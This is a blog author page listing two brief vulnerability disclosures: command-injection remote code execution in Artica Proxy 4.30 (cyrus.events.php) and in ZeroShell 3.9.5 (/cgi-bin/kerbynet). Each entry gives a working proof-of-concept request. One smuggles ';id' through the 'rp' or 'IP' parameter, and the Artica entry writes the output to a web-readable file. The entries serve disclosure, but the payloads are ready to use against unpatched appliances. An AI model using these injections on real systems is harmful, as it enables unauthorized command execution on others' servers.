Open in app

Sign In

Write

Sign In

rootless
rootless

1 Follower

Home

About

Sep 26, 2021

Artica Proxy 4.30 cyrus.events.php RCE

Vendor && Product www.articatech.com Artica Web Proxy v4.30.000000 Download: http://www.articatech.com/download.php Reproduction Login the web account, use this poc Because the execution result is not echoed, we view the result by writing a file https://192.168.108.14:9000/cyrus.events.php?logs= ​ POST: rp=;id>../1.txt; access https://192.168.108.14:9000/1.txt, we can see the execution result.

Vulnerability

2 min read

Artica Proxy 4.30 cyrus.events.php RCE
Artica Proxy 4.30 cyrus.events.php RCE
Vulnerability

2 min read


Sep 24, 2021

Zeroshell 3.9.5 Authenticated RCE

The latest version of ZeroShell (3.9.5) has a command injection vulnerability in /cgi-bin/kerbynet, attackers can execute os command through IP parameter. IP parameters are used in two places: POC: /cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPARP&IP=;id /cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPPING&IP=;id&PacketSize=

Vulnerability

1 min read

Zeroshell 3.9.5 Authenticated RCE
Zeroshell 3.9.5 Authenticated RCE
Vulnerability

1 min read

rootless

rootless

1 Follower

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Text to speech